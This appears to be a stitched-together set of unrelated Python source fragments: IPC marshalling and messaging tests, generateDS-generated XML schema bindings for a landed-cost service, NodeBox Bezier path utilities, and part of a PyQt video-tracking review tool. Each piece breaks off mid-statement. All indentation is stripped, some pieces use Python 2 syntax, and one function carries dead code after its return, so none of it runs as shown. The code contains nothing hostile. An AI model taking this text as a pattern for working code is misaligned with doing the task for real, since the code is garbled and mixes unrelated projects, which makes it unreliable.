foo = ('eat', 'more', 'spam', 'for', 'life')
for i in range(0,5) :
ds2.ar[i] = struct2()
ds2.ar[i].str = foo[i]
ds2.ar[i].d = float(pow(i,3))
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, struct5))
fmt3 = IPC_parseFormat("{int, int, <int : 1, 2>}")
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct6()
ds3.dim1 = 3; ds3.dim2 = 4; ds3.ar = [None]*ds3.dim1
for i in range(0, 3) :
ds3.ar[i] = list(range(pow(i+1,2), pow(i+1,2)+ds3.dim2))
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
ds3a = struct6();
IPC_unmarshall(fmt3, vc3.content, ds3a)
print(ds3a)
print(IPC_unmarshallData(fmt3, vc3.content, struct6))
# Stand-in for enumerated type
WaitVal = 0; SendVal = 1; ReceiveVal = 2; ListenVal = 3
class struct7(IPCdata) :
_fields = ('i1', 'status')
# test enums
def test6 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, {enum WaitVal, SendVal, ReceiveVal, ListenVal}}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct7(); ds1a = struct7()
ds1.i1 = 42; ds1.status = ReceiveVal
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("[{enum WaitVal, SendVal, ReceiveVal, ListenVal}: 3]")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = [None]*3; ds2[0] = SendVal; ds2[1] = ListenVal; ds2[2] = WaitVal;
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
print(IPC_unmarshallData(fmt2, vc2.content, struct7))
fmt3 = IPC_parseFormat("{int, {enum : 4}}")
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct7(); ds3.i1 = 42; ds3.status = ReceiveVal
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
print(IPC_unmarshallData(fmt3, vc3.content, struct7))
# test pointers
def test7 () :
IPC_initialize()
fmt1 = IPC_parseFormat("{int, {string, double}}")
vc1 = IPC_VARCONTENT_TYPE()
ds1 = struct1(); ds1a = struct1()
ds1.i = 666; ds1.a1 = struct2();
ds1.a1.str = "hello"; ds1.a1.d = 3.14159
IPC_marshall(fmt1, ds1, vc1)
printVC(vc1)
IPC_unmarshall(fmt1, vc1.content, ds1a)
print(ds1a)
fmt2 = IPC_parseFormat("{*int, *{string, double}}")
vc2 = IPC_VARCONTENT_TYPE()
ds2 = struct1(); ds2a = struct1()
ds2.i = 666; ds2.a1 = struct2();
ds2.a1.str = "hello"; ds2.a1.d = 3.14159
IPC_marshall(fmt2, ds2, vc2)
printVC(vc2)
IPC_unmarshall(fmt2, vc2.content, ds2a)
print(ds2a)
fmt3 = fmt2
vc3 = IPC_VARCONTENT_TYPE()
ds3 = struct1()
ds3.i = 666; ds3.a1 = None
IPC_marshall(fmt3, ds3, vc3)
printVC(vc3)
print(IPC_unmarshallData(fmt3, vc3.content, struct1))
# test named formatters
# Need to be connected to IPC central to test this...
def test8 () :
IPC_initialize()
print(IPC_parseFormat(""))
print(IPC_parseFormat(None))
def msgHandler1 (msgInstance, data, clientData) :
print('msgHandler1:', IPC_msgInstanceName(msgInstance), data, clientData)
def msgHandler2 (msgInstance, data, clientData) :
print('msgHandler2:', IPC_msgInstanceName(msgInstance), data, clientData, \
IPC_dataLength(msgInstance))
def test9 () :
IPC_connect("test")
IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
IPC_msgClass("f", int)
IPC_subscribeData("f", msgHandler1, 1)
IPC_listenWait(100) # Seems to be a timing issue here, sometimes
IPC_publishData("f", 42)
IPC_listenWait(500)
print
IPC_subscribeData("f", msgHandler2, 3)
IPC_publishData("f", 666)
IPC_listenWait(500)
print
IPC_subscribeData("f", msgHandler1, 2)
print("Num handlers:", IPC_numHandlers("f"))
IPC_publishData("f", 1234)
IPC_listenWait(500)
print
IPC_unsubscribe("f", msgHandler2)
print("Num handlers:", IPC_numHandlers("f"))
vc = IPC_VARCONTENT_TYPE()
IPC_marshall(IPC_msgFormatter("f"), 4321, vc)
IPC_publishVC("f", vc)
IPC_listenWait(500)
IPC_disconnect()
exit = False
def stdinHnd (fd, clientData) :
global exit
msg = sys.stdin.readline()
if (msg[0] in ('?', 'h')) :
print("h: help")
print("q: quit")
print("u: stop listening")
elif (msg[0] == 'q') :
print("quit")
exit = True
elif (msg[0] == 'u') :
print("Silent")
IPC_unsubscribeFD(fd, stdinHnd)
else :
print("Unhandled input:", msg)
def test10 () :
global exit
IPC_connect("test")
IPC_subscribeFD(sys.stdin.fileno(), stdinHnd)
exit = False
print("Please type -- either 'h' or 'q', end with a 'q'")
while (not exit) : IPC_listen(1000)
IPC_disconnect()
def test11 () :
IPC_connect("test")
IPC_perror("Test")
IPC_setCapacity(3)
IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
IPC_setMsgQueueLength("f", 1)
IPC_setMsgPriority("f", 2)
IPC_setVerbosity(IPC_Print_Errors)
IPC_disconnect()
IPC_defineMsg("h", IPC_VARIABLE_LENGTH, "int")
IPC_disconnect()
def test12 () :
IPC_connect("test")
IPC_defineMsg("f", IPC_VARIABLE_LENGTH, "int")
IPC_defineMsg("h", IPC_VARIABLE_LENGTH, "int")
IPC_subscribeData("f", msgHandler1, 1)
IPC_subscribeData("f", msgHandler1, 2)
IPC_subscribeData("g", msgHandler1, 1)
IPC_disconnect()
def msgHandler3 (msgInstance, byteArray, clientData) :
(data, retVal) = IPC_unmarshallData(IPC_msgFormatter("g"), byteArray, int)
print('msgHandler3:', IPC_msgInstanceName(msgInstance), data, clientData, \
IPC_dataLength(msgInstance))
IPC_freeByteArray(byteArray)
def test13 () :
IPC_connect("test")
IPC_defineMsg("f", 4, None)
IPC_subscribe("f", msgHandler3) # optional client data
IPC_defineMsg("g", IPC_VARIABLE_LENGTH, "int")
IPC_listenWait(100); # Seems to be a timing issue here, sometimes
vc = IPC_VARCONTENT_TYPE()
IPC_marshall(IPC_parseFormat("int"), 1234, vc)
IPC_publish("f", vc.length, vc.content)
IPC_listenWait(500)
IPC_publishVC("f", vc)
IPC_listenWait(500)
IPC_publishFixed("f", vc.content)
IPC_listenWait(500)
IPC_disconnect()
connected = False
disconnected = False
def connectHandler1 (moduleName, clientData) :
global connected
connected = True
print("connectHandler1:", moduleName, clientData)
def connectHandler2 (moduleName, clientData) :
print("connectHandler2:", moduleName, clientData)
def disconnectHandler1 (moduleName, clientData) :
global disconnected
disconnected = True
print("disconnectHandler1:", moduleName, clientData)
def disconnectHandler2 (moduleName, clientData) :
print("disconnectHandler2:", moduleName, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Sat Mar 7 09:04:16 2020 by generateDS.py version 2.35.15.
# Python 3.8.1 (v3.8.1:1b293b6006, Dec 18 2019, 14:08:53) [Clang 6.0 (clang-600.0.57)]
#
# Command line options:
# ('--no-namespace-defs', '')
# ('-o', './python/landed_cost_web_service_schema.py')
#
# Command line arguments:
# ./schemas/LandedCostWebServiceSchema.xsd
#
# Command line:
# /Users/danielkobina/Documents/Open/.env/bin/generateDS --no-namespace-defs -o "./python/landed_cost_web_service_schema.py" ./schemas/LandedCostWebServiceSchema.xsd
#
# Current working directory (os.getcwd()):
# 2020-03
#
from six.moves import zip_longest
import os
import sys
import re as re_
import base64
import datetime as datetime_
import decimal as decimal_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
SaveElementTreeNode = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
try:
if isinstance(infile, os.PathLike):
infile = os.path.join(infile)
except AttributeError:
pass
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
def parsexmlstring_(instring, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
element = etree_.fromstring(instring, parser=parser, **kwargs)
return element
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for an example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
# Additionally, the generatedsnamespaces module can contain a python
# dictionary named GenerateDSNamespaceTypePrefixes that associates element
# types with the namespace prefixes that are to be added to the
# "xsi:type" attribute value. See the exportAttributes method of
# any generated element type and the generation of "xsi:type" for an
# example of the use of this table.
# An example table:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceTypePrefixes = {
# "ElementtypeC": "aaa:",
# "ElementtypeD": "bbb:",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
try:
from generatedsnamespaces import GenerateDSNamespaceTypePrefixes as GenerateDSNamespaceTypePrefixes_
except ImportError:
GenerateDSNamespaceTypePrefixes_ = {}
#
# You can replace the following class definition by defining an
# importable module named "generatedscollector" containing a class
# named "GdsCollector". See the default class definition below for
# clues about the possible content of that class.
#
try:
from generatedscollector import GdsCollector as GdsCollector_
except ImportError:
class GdsCollector_(object):
def __init__(self, messages=None):
if messages is None:
self.messages = []
else:
self.messages = messages
def add_message(self, msg):
self.messages.append(msg)
def get_messages(self):
return self.messages
def clear_messages(self):
self.messages = []
def print_messages(self):
for msg in self.messages:
print("Warning: {}".format(msg))
def write_messages(self, outstream):
for msg in self.messages:
outstream.write("Warning: {}\n".format(msg))
#
# The super-class for enum types
#
try:
from enum import Enum
except ImportError:
Enum = object
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
__hash__ = object.__hash__
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_parse_string(self, input_data, node=None, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_parse_integer(self, input_data, node=None, input_name=''):
try:
ival = int(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires integer value: %s' % exp)
return ival
def gds_validate_integer(self, input_data, node=None, input_name=''):
try:
value = int(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires integer value')
return value
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integer valuess')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_parse_float(self, input_data, node=None, input_name=''):
try:
fval_ = float(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires float or double value: %s' % exp)
return fval_
def gds_validate_float(self, input_data, node=None, input_name=''):
try:
value = float(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires float value')
return value
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of float values')
return values
def gds_format_decimal(self, input_data, input_name=''):
return ('%s' % input_data).rstrip('0')
def gds_parse_decimal(self, input_data, node=None, input_name=''):
try:
decimal_value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return decimal_value
def gds_validate_decimal(self, input_data, node=None, input_name=''):
try:
value = decimal_.Decimal(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires decimal value')
return value
def gds_format_decimal_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_decimal_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
decimal_.Decimal(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of decimal values')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_parse_double(self, input_data, node=None, input_name=''):
try:
fval_ = float(input_data)
except (TypeError, ValueError) as exp:
raise_parse_error(node, 'Requires double or float value: %s' % exp)
return fval_
def gds_validate_double(self, input_data, node=None, input_name=''):
try:
value = float(input_data)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires double or float value')
return value
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(
node, 'Requires sequence of double or float values')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_parse_boolean(self, input_data, node=None, input_name=''):
if input_data in ('true', '1'):
bval = True
elif input_data in ('false', '0'):
bval = False
else:
raise_parse_error(node, 'Requires boolean value')
return bval
def gds_validate_boolean(self, input_data, node=None, input_name=''):
if input_data not in (True, 1, False, 0, ):
raise_parse_error(
node,
'Requires boolean value '
'(one of True, 1, False, 0)')
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in (True, 1, False, 0, ):
raise_parse_error(
node,
'Requires sequence of boolean values '
'(one of True, 1, False, 0)')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (
time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
| |
- start
d = n
if amount > 1:
# The delta value is divided by amount-1, because we also want the last point (t=1.0)
# If we don't use amount-1, we fall one point short of the end.
# If amount=4, we want the point at t 0.0, 0.33, 0.66 and 1.0.
# If amount=2, we want the point at t 0.0 and 1.0.
d = float(n) / (amount-1)
for i in xrange(amount):
yield point(path, start+d*i, segments)
#--- BEZIER PATH CONTOURS ----------------------------------------------------------------------------
def contours(path):
""" Returns a list of contours in the path, as BezierPath objects.
A contour is a sequence of lines and curves separated from the next contour by a MOVETO.
For example, the glyph "o" has two contours: the inner circle and the outer circle.
"""
contours = []
current_contour = None
empty = True
for i, el in enumerate(path):
if el.cmd == MOVETO:
if not empty:
contours.append(current_contour)
current_contour = BezierPath()
current_contour.moveto(el.x, el.y)
empty = True
elif el.cmd == LINETO:
empty = False
current_contour.lineto(el.x, el.y)
elif el.cmd == CURVETO:
empty = False
current_contour.curveto(el.ctrl1.x, el.ctrl1.y, el.ctrl2.x, el.ctrl2.y, el.x, el.y)
elif el.cmd == CLOSE:
current_contour.closepath()
if not empty:
contours.append(current_contour)
return contours
#--- BEZIER PATH FROM POINTS -------------------------------------------------------------------------
def findpath(points, curvature=1.0):
""" Constructs a smooth BezierPath from the given list of points.
The curvature parameter offers some control on how separate segments are stitched together:
from straight angles to smooth curves.
Curvature is only useful if the path has more than three points.
"""
# The list of points consists of Point objects,
# but it shouldn't crash on something straightforward
# as someone supplying a list of (x,y)-tuples.
from types import TupleType
for i, pt in enumerate(points):
if type(pt) == TupleType:
points[i] = Point(pt[0], pt[1])
# No points: return nothing.
if len(points) == 0: return None
# One point: return a path with a single MOVETO-point.
if len(points) == 1:
path = BezierPath(None)
path.moveto(points[0].x, points[0].y)
return path
# Two points: path with a single straight line.
if len(points) == 2:
path = BezierPath(None)
path.moveto(points[0].x, points[0].y)
path.lineto(points[1].x, points[1].y)
return path
# Zero curvature means path with straight lines.
curvature = max(0, min(1, curvature))
if curvature == 0:
path = BezierPath(None)
path.moveto(points[0].x, points[0].y)
for i in range(len(points)):
path.lineto(points[i].x, points[i].y)
return path
# Construct the path with curves.
curvature = 4 + (1.0-curvature)*40
# The first point's ctrl1 and ctrl2 and last point's ctrl2
# will be the same as that point's location;
# we cannot infer how the path curvature started or will continue.
dx = {0: 0, len(points)-1: 0}
dy = {0: 0, len(points)-1: 0}
bi = {1: -0.25}
ax = {1: (points[2].x-points[0].x-dx[0]) / 4}
ay = {1: (points[2].y-points[0].y-dy[0]) / 4}
for i in range(2, len(points)-1):
bi[i] = -1 / (curvature + bi[i-1])
ax[i] = -(points[i+1].x-points[i-1].x-ax[i-1]) * bi[i]
ay[i] = -(points[i+1].y-points[i-1].y-ay[i-1]) * bi[i]
r = range(1, len(points)-1)
r.reverse()
for i in r:
dx[i] = ax[i] + dx[i+1] * bi[i]
dy[i] = ay[i] + dy[i+1] * bi[i]
path = BezierPath(None)
path.moveto(points[0].x, points[0].y)
for i in range(len(points)-1):
path.curveto(points[i].x + dx[i],
points[i].y + dy[i],
points[i+1].x - dx[i+1],
points[i+1].y - dy[i+1],
points[i+1].x,
points[i+1].y)
return path
#--- BEZIER PATH INSERT POINT ------------------------------------------------------------------------
def insert_point(path, t):
""" Inserts an extra point at t.
"""
# Find the points before and after t on the path.
i, t, closeto = _locate(path, t)
x0 = path[i].x
y0 = path[i].y
p1 = path[i+1]
p1cmd, x3, y3, x1, y1, x2, y2 = p1.cmd, p1.x, p1.y, p1.ctrl1.x, p1.ctrl1.y, p1.ctrl2.x, p1.ctrl2.y
# Construct the new point at t.
if p1cmd == CLOSE:
pt_cmd = LINETO
pt_x, pt_y = linepoint(t, x0, y0, closeto.x, closeto.y)
elif p1cmd == LINETO:
pt_cmd = LINETO
pt_x, pt_y = linepoint(t, x0, y0, x3, y3)
elif p1cmd == CURVETO:
pt_cmd = CURVETO
pt_x, pt_y, pt_c1x, pt_c1y, pt_c2x, pt_c2y, pt_h1x, pt_h1y, pt_h2x, pt_h2y = \
curvepoint(t, x0, y0, x1, y1, x2, y2, x3, y3, True)
else:
raise PathError, "Locate should not return a MOVETO"
# NodeBox for OpenGL modifies the path in place,
# NodeBox for Mac OS X returned a path copy (see inactive code below).
if pt_cmd == CURVETO:
path[i+1].ctrl1.x = pt_c2x
path[i+1].ctrl1.y = pt_c2y
path[i+1].ctrl2.x = pt_h2x
path[i+1].ctrl2.y = pt_h2y
path.insert(i+1, PathElement(cmd=CURVETO, pts=[(pt_h1x, pt_h1y), (pt_c1x, pt_c1y), (pt_x, pt_y)]))
elif pt_cmd == LINETO:
path.insert(i+1, PathElement(cmd=LINETO, pts=[(pt_x, pt_y)]))
else:
raise PathError, "Didn't expect pt_cmd %s here" % pt_cmd
return path[i+1]
#new_path = BezierPath(None)
#new_path.moveto(path[0].x, path[0].y)
#for j in range(1, len(path)):
# if j == i+1:
# if pt_cmd == CURVETO:
# new_path.curveto(pt_h1x, pt_h1y, pt_c1x, pt_c1y, pt_x, pt_y)
# new_path.curveto(pt_c2x, pt_c2y, pt_h2x, pt_h2y, path[j].x, path[j].y)
# elif pt_cmd == LINETO:
# new_path.lineto(pt_x, pt_y)
# if path[j].cmd != CLOSE:
# new_path.lineto(path[j].x, path[j].y)
# else:
# new_path.closepath()
# else:
# raise PathError, "Didn't expect pt_cmd %s here" % pt_cmd
# else:
# if path[j].cmd == MOVETO:
# new_path.moveto(path[j].x, path[j].y)
# if path[j].cmd == LINETO:
# new_path.lineto(path[j].x, path[j].y)
# if path[j].cmd == CURVETO:
# new_path.curveto(path[j].ctrl1.x, path[j].ctrl1.y,
# path[j].ctrl2.x, path[j].ctrl2.y,
# path[j].x, path[j].y)
# if path[j].cmd == CLOSE:
# new_path.closepath()
return new_path
#=====================================================================================================
#--- BEZIER ARC --------------------------------------------------------------------------------------
# Copyright (c) 2005-2008, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Enthought, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from math import acos, sin, cos, hypot, ceil, sqrt, radians, degrees
def arc(x1, y1, x2, y2, angle=0, extent=90):
""" Compute a cubic Bezier approximation of an elliptical arc.
(x1, y1) and (x2, y2) are the corners of the enclosing rectangle.
The coordinate system has coordinates that increase to the right and down.
Angles, measured in degrees, start with 0 to the right (the positive X axis)
and increase counter-clockwise.
The arc extends from angle to angle+extent.
I.e. angle=0 and extent=180 yields an openside-down semi-circle.
The resulting coordinates are of the form (x1,y1, x2,y2, x3,y3, x4,y4)
such that the curve goes from (x1, y1) to (x4, y4)
with (x2, y2) and (x3, y3) as their respective Bezier control points.
"""
x1, y1, x2, y2 = min(x1,x2), max(y1,y2), max(x1,x2), min(y1,y2)
extent = min(max(extent, -360), 360)
n = abs(extent) <= 90 and 1 or int(ceil(abs(extent) / 90.0))
a = float(extent) / n
cx = float(x1 + x2) / 2
cy = float(y1 + y2) / 2
rx = float(x2 - x1) / 2
ry = float(y2 - y1) / 2
a2 = radians(a) / 2
kappa = abs(4.0 / 3 * (1 - cos(a2)) / sin(a2))
points = []
for i in range(n):
theta0 = radians(angle + (i+0) * a)
theta1 = radians(angle + (i+1) * a)
c0, c1 | |
'code', 'old', 'new'])
for change in self.changeList:
if change.frame not in self.undone_changes:
writer.writerow(
[
change.frame,
change.end,
change.change.name,
change.change.value,
change.orig,
change.new,
]
)
@qc.pyqtSlot(str)
def loadChangeList(self, fname: str) -> None:
self.changeList.clear()
with open(fname) as fd:
reader = csv.DictReader(fd)
idx = 0
for row in reader:
new = int(row['new']) if len(row['new']) > 0 else None
chcode = getattr(ChangeCode, row['change'])
change = Change(
frame=int(row['frame']),
end=int(row['end']),
change=chcode,
orig=int(row['orig']),
new=new,
idx=idx,
)
self.changeList.add(change)
idx += 1
self.sigChangeList.emit(self.changeList)
class ReviewScene(FrameScene):
def __init__(self, *args, **kwargs):
super(ReviewScene, self).__init__(*args, **kwargs)
self.drawingDisabled = True
self.lineStyleOldTrack = qc.Qt.DashLine
self.histGradient = 1
self.trackHist = []
self.markerThickness = settings.value(
'review/marker_thickness', 2.0, type=float
)
self.pathDia = settings.value('review/path_diameter', 5)
self.trackStyle = '-' # `-` for line, `o` for ellipse
# TODO implement choice of the style
@qc.pyqtSlot(int)
def setHistGradient(self, age: int) -> None:
self.histGradient = age
@qc.pyqtSlot(float)
def setTrackMarkerThickness(self, thickness: float) -> None:
"""Set the thickness of the marker-edge for drawing paths"""
self.markerThickness = thickness
settings.setValue('review/marker_thickness', thickness)
@qc.pyqtSlot(np.ndarray, str)
def showTrackHist(self, track: np.ndarray, cmap: str) -> None:
for item in self.trackHist:
try:
self.removeItem(item)
except Exception as e:
logging.debug(f'{e}')
pass
self.trackHist = []
if self._frame is None:
return
colors = [
qg.QColor(*get_cmap_color(ii, len(track), cmap))
for ii in range(len(track))
]
pens = [
qg.QPen(qg.QBrush(color), self.markerThickness) for color in colors
]
if self.trackStyle == '-':
self.trackHist = [
self.addLine(
track[ii - 1][0],
track[ii - 1][1],
track[ii][0],
track[ii][1],
pens[ii],
)
for ii in range(1, len(track))
]
elif self.trackStyle == 'o':
self.trackHist = [
self.addEllipse(
track[ii][0],
track[ii][1],
self.pathDia,
self.pathDia,
pens[ii],
)
for ii in range(len(track))
]
@qc.pyqtSlot(float)
def setPathDia(self, val):
self.pathDia = val
@qc.pyqtSlot(dict)
def setRectangles(self, rects: Dict[int, np.ndarray]) -> None:
"""rects: a dict of id: (x, y, w, h, frame)
This overrides the same slot in FrameScene where each rectangle has
a fifth entry indicating frame no of the rectangle.
The ones from earlier frame that are not present in the current frame
are displayed with a special line style (default: dashes)
"""
logging.debug(
f'{self.objectName()} Received rectangles from {self.sender().objectName()}'
)
logging.debug(f'{self.objectName()} Rectangles: {rects}')
logging.debug(f'{self.objectName()} cleared')
self.clearItems()
tmpRects = {id_: rect[:4] for id_, rect in rects.items()}
super(ReviewScene, self).setRectangles(tmpRects)
for id_, tdata in rects.items():
if tdata.shape[0] != 5:
raise ValueError(f'Incorrectly sized entry: {id_}: {tdata}')
item = self.itemDict[id_]
label = self.labelDict[id_]
if tdata[4] < self.frameno:
alpha = int(
255
* (
1
- 0.9
* min(
np.abs(self.frameno - tdata[4]), self.histGradient
)
/ self.histGradient
)
)
pen = item.pen()
color = pen.color()
color.setAlpha(alpha)
pen.setColor(color)
pen.setStyle(self.lineStyleOldTrack)
item.setPen(pen)
label.setDefaultTextColor(color)
label.setFont(self.font)
label.adjustSize()
self.update()
def clearAll(self):
super(ReviewScene, self).clearAll()
self.trackHist = []
self.selected = []
class TrackView(FrameView):
"""Visualization of bboxes of objects on video frame with facility to set
visible area of scene"""
sigSelected = qc.pyqtSignal(list)
sigTrackDia = qc.pyqtSignal(float)
sigTrackMarkerThickness = qc.pyqtSignal(float)
def __init__(self, *args, **kwargs):
super(TrackView, self).__init__(*args, **kwargs)
self.sigSelected.connect(self.scene().setSelected)
self.sigTrackDia.connect(self.scene().setPathDia)
self.sigTrackMarkerThickness.connect(
self.frameScene.setTrackMarkerThickness
)
def setViewportRect(self, rect: qc.QRectF) -> None:
self.fitInView(
rect.x(),
rect.y(),
rect.width(),
rect.height(),
qc.Qt.KeepAspectRatio,
)
def _makeScene(self):
self.frameScene = ReviewScene()
self.setScene(self.frameScene)
@qc.pyqtSlot()
def setPathDia(self):
input_, accept = qw.QInputDialog.getDouble(
self,
'Diameter of path markers',
